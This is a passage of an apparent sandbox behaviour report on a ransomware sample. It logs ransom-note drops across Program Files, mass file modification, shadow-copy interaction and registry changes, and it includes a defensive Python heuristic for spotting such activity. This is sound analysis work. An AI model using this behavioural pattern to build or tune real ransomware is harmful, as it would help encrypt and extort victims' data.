| File created | C:\Program Files\VideoLAN\VLC\plugins\stream_out\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\css\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mousedown.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ta\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hy\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\en-GB.pak | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Journal\Templates\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_rest.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\icon.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\MSInfo\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ie\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\is\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Subpicture1.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Etc\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cs.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\System\msadc\fr-FR\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\video_filter\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\month.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
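The rows above alternate between creating the same note file in one directory after another and opening existing files of many types for modification, all from one process under %AppData%. The following is an added triage example, not the sandbox's signature code, run over a hand-copied subset of those rows: per process it counts how many distinct directories receive an identically named created file and how many distinct extensions are opened for write; a process that does both is behaving like a file encryptor dropping a ransom note. The thresholds `note_min_dirs` and `min_extensions` are illustrative assumptions.

```python
import ntpath
from collections import Counter, defaultdict

# Constructed input: a subset of the "Drops file in Program Files directory"
# rows of this report as (action, path, process) triples.
PROC = r"C:\Users\Admin\AppData\Roaming\qrsjojt.exe"
FILE_EVENTS = [
    ("File created", r"C:\Program Files\VideoLAN\VLC\locale\fi\HELP_RESTORE_FILES.txt", PROC),
    ("File created", r"C:\Program Files\VideoLAN\VLC\locale\zh_TW\HELP_RESTORE_FILES.txt", PROC),
    ("File created", r"C:\Program Files\Windows Media Player\ja-JP\HELP_RESTORE_FILES.txt", PROC),
    ("File created", r"C:\Program Files\VideoLAN\VLC\locale\mai\HELP_RESTORE_FILES.txt", PROC),
    ("File created", r"C:\Program Files\Windows Media Player\en-US\HELP_RESTORE_FILES.txt", PROC),
    ("File created", r"C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\es-ES\HELP_RESTORE_FILES.txt", PROC),
    ("File created", r"C:\Program Files\VideoLAN\VLC\plugins\stream_out\HELP_RESTORE_FILES.txt", PROC),
    ("File created", r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\HELP_RESTORE_FILES.txt", PROC),
    ("File opened for modification", r"C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport.png", PROC),
    ("File opened for modification", r"C:\Program Files\7-Zip\Lang\nn.txt", PROC),
    ("File opened for modification", r"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\en-GB.pak", PROC),
    ("File opened for modification", r"C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css", PROC),
    ("File opened for modification", r"C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json", PROC),
    ("File opened for modification", r"C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js", PROC),
    ("File opened for modification", r"C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\icon.png", PROC),
]


def _new_stats():
    return {
        "created_dirs": defaultdict(set),  # file name -> directories it was created in
        "modified_ext": Counter(),         # extension -> number of files opened for write
        "modified_dirs": set(),            # directories containing modified files
    }


def triage_file_events(events, note_min_dirs=5, min_extensions=4):
    """Summarise file activity per process and score it for ransomware traits."""
    per_proc = defaultdict(_new_stats)
    for action, path, proc in events:
        directory, name = ntpath.split(path)
        stats = per_proc[proc.lower()]
        if action == "File created":
            stats["created_dirs"][name.lower()].add(directory.lower())
        elif action == "File opened for modification":
            ext = ntpath.splitext(name)[1].lower().lstrip(".")
            stats["modified_ext"][ext] += 1
            stats["modified_dirs"].add(directory.lower())

    report = {}
    for proc, stats in per_proc.items():
        # A "note" is one file name planted in many directories.
        notes = {n: len(d) for n, d in stats["created_dirs"].items() if len(d) >= note_min_dirs}
        ext_count = len(stats["modified_ext"])
        report[proc] = {
            "ransom_note_candidates": notes,
            "modified_extension_count": ext_count,
            "modified_dir_count": len(stats["modified_dirs"]),
            "ransomware_like": bool(notes) and ext_count >= min_extensions,
        }
    return report


if __name__ == "__main__":
    for proc, summary in triage_file_events(FILE_EVENTS).items():
        print(proc, summary)
```

The full report lists thousands of renames (see the summary at the top of the page); this subset is enough to trip the heuristic, which is the point of counting distinct directories and extensions rather than raw event volume.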
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AE715C1-A24B-11EF-82CE-E62D5E492327} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437724841" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 802835115836db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AE6EEB1-A24B-11EF-82CE-E62D5E492327} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value omitted) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
